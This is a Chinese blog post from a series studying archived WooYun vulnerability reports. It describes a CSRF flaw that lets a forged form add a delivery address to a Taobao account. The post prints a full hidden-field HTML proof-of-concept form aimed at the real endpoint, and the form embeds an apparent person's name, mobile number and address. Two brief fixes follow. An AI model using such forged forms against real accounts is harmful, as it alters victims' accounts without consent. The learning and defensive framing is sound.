【漏洞学习——CSRF】淘宝网CSRF添加收货地址

最新推荐文章于 2024-05-21 08:50:02 发布
最新推荐文章于 2024-05-21 08:50:02 发布
阅读量1.2k 收藏
点赞数
分类专栏: 【渗透测试实战】 # 乌云漏洞案例学习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Fly_hps/article/details/84389810
版权

漏洞细节

漏洞URL:http://member1.taobao.com/member/fresh/deliver_address.htm

收获地址细节:

表单信息内容

<html>
  <body>
    <form action="http://member1.taobao.com/member/fresh/deliver_address.htm" method="POST">
      <input type="hidden" name="action" value="DeliverAddressMgr" />
      <input type="hidden" name="event&#95;submit&#95;do&#95;save" value="anything" />
      <input type="hidden" name="from" value="mbis" />
      <input type="hidden" name="isFrame" value="false" />
      <input type="hidden" name="token" value="" />
      <input type="hidden" name="lang" value="zh&#45;S" />
      <input type="hidden" name="&#95;tb&#95;token&#95;" value="OXM1aifkM5p" />
      <input type="hidden" name="id" value="" />
      <input type="hidden" name="x" value="25&#46;03945" />
      <input type="hidden" name="y" value="102&#46;714729" />
      <input type="hidden" name="reurl" value="" />
      <input type="hidden" name="country" value="" />
      <input type="hidden" name="prov" value="530000" />
      <input type="hidden" name="provExt" value="" />
      <input type="hidden" name="city" value="530100" />
      <input type="hidden" name="area" value="530102" />
      <input type="hidden" name="town" value="530102002" />
      <input type="hidden" name="addressDetail" value="&#187;&#164;&#185;úÂ&#183;68ºÅ&#32;ÖÐ&#185;úÅ&#169;Òµ&#183;&#162;Õ&#185;ÒøÐÐÔÆÄÏÊ&#161;&#183;ÖÐÐ&#191;Í&#183;&#191;&#178;&#191;" />
      <input type="hidden" name="post" value="650001" />
      <input type="hidden" name="fullName" value="ÀîöÎ" />
      <input type="hidden" name="mobile&#95;area" value="1" />
      <input type="hidden" name="mobile" value="18206849493" />
      <input type="hidden" name="phone&#95;area" value="1" />
      <input type="hidden" name="phoneSection" value="0871" />
      <input type="hidden" name="phoneCode" value="3528991" />
      <input type="hidden" name="phoneExt" value="352799" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

使用burpsuite生成CSRF请求包,之后再浏览器当中进行访问

修复方案

1、检查Reference
2、添加CSRF-Token校验

 

参见:https://bugs.shuimugan.com/bug/view?bug_no=164471

FLy_鹏程万里
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
CSRF攻击与防御(写得非常好)
认知 行动 坚持
12-08 25万+
转载地址:http://www.phpddt.com/reprint/csrf.html CSRF概念:CSRF跨站点请求伪造(Cross—Site Request Forgery),跟XSS攻击一样,存在巨大的危害性,你可以这样来理解: 攻击者盗用了你的身份,以你的名义发送恶意请求,对服务器来说这个请求是完全合法的,但是却完成了攻击者所期望的一个操作,
Django中的CSRF
weixin_30670965的博客
03-31 144
CSRF(Cross Site Request Forgery, 跨站域请求伪造) CSRF 背景与介绍 CSRF(Cross Site Request Forgery, 跨站域请求伪造)是一种网络的攻击方式,它在 2007 年曾被列为互联网 20 大安全隐患之一。其他安全隐患,比如 SQL 脚本注入,跨站域脚本攻击等在近年来已经逐渐为众人熟知,很多网站也都针对他们进行了防御。然而,对于...
什么是CSRFCSRF漏洞原理攻击与防御(非常详细)零基础入门到精通,收藏这一篇就够了
最新发布
Javachichi的博客
05-21 1639
这时该转帐请求的 Referer 值就会是转账按钮所在的页面的URL,而如果黑客要对银行网站实施 CSRF攻击,他只能在他自己的网站构造请求,当用户User通过黑客的网站发送请求到WebA时,该请求的 Referer 是指向黑客自己的网站。你可以这么来理解:攻击者盗用了你的身份,以你的名义发送恶意请求,对服务器来说这个请求是完全合法的,但是却完成了攻击者所期望的一个操作,比如以你的名义发送邮件、发消息,盗取你的账号,添加系统管理员,甚至于购买商品、虚拟货币转账等。比如在PHP中,如果使用的是。
csrf
weixin_44897902的博客
07-13 392
时隔多天,我又回来啦! 今日份心灵鸡汤: 你要悄悄努力,然后惊艳所有人 今天是csrf漏洞学习 csrf:跨站请求伪造,是通过利用cookie进行攻击,(与xss不同,xss是通过盗取cookie进行利用)是因为浏览器中cookie不会过期,默认了登录状态,攻击者发送构造好了的csrf脚本或者是包含了crsf脚本的链接执行一些非用户做的事情。 如何确认一个web系统存在CSRF漏洞: 1.对目标网站增删改的地方进行标记,并观察其逻辑,判断请求是否可以被伪造   比如修改管理员账号时,并不需要验证旧密码
CSRF
ivalue的博客
07-26 622
1 CSRF(Cross-site request forgery)跨站请求伪造,也被称为“One Click Attack”或者Session Riding,通常缩写为CSRF或者XSRF,是一种对网站的恶意利用。尽管听起来像跨站脚本(XSS),但它与XSS非常不同,XSS利用站点内的信任用户,而CSRF则通过伪装来自受信任用户的请求来利用受信任的网站。 攻击者盗用了你的身份,以你的名义发送...
【基本功】 前端安全系列之二:如何防止CSRF攻击?
美团技术团队
10-11 3623
总第290篇2018年 第82篇当当当当,我是美团技术团队的程序员鼓励师美美~“基本功”专栏又来新文章了,本篇是我们前端安全系列文章的第二篇,主要聊聊前端开发过程中遇到的...
基础漏洞csrf挖掘实战
10-07
**跨站请求伪造(CSRF)攻击详解** 跨站请求伪造(CSRF)是一种网络攻击方式,它利用了用户浏览器的已登录状态,使攻击者能够以受害者的身份执行非授权的操作。攻击者通常借助受害者在其他网站上的合法会话,通过...
espcms csrf漏洞 导致任意管理员添加1
08-03
然而,该系统在其后台管理界面存在一个严重的CSRF(Cross-Site Request Forgery,跨站请求伪造)漏洞,允许攻击者在没有权限的情况下任意添加管理员账号。由于在管理员添加页面缺少了必要的CSRF防护令牌,攻击者可以...
CSRF漏洞的靶场实验
09-19
CSRF(Cross-Site Request Forgery,跨站请求伪造)是一种常见的网络安全漏洞,它允许攻击者在用户已登录且浏览器保持会话状态的情况下,诱使用户执行非本意的操作。在“CSRF漏洞的靶场实验”中,我们将通过实际操作...
hucart-含有CSRF漏洞的源码.zip
12-31
在这个案例中,"hucart-含有CSRF漏洞的源码.zip" 提供了一个实际的示例,让我们深入探讨一下CSRF漏洞的原理、危害以及防范措施。 1. **CSRF漏洞原理**: CSRF漏洞通常发生在Web应用程序中,这些应用未对请求进行...
CSRF漏洞详细说明
02-26
经常入选owasp漏洞列表Top10,在当前web漏洞排行中,与XSS和SQL注入并列前三。与前两者相比,CSRF相对来说受到的关注要小很多,但是危害却非常大。通常情况下,有三种方法被广泛用来防御CSRF攻击:验证token,验证...
CSRF思路分享.docx
04-14
"文档分享了关于CSRF(跨站请求伪造)漏洞的深入理解和示例,包括其成因、危害,以及如何通过结合XSS漏洞来触发CSRF攻击。" **CSRF(跨站请求伪造)** 是一种网络安全漏洞,它允许攻击者在用户已登录某网站的情况下...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

FLy_鹏程万里

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值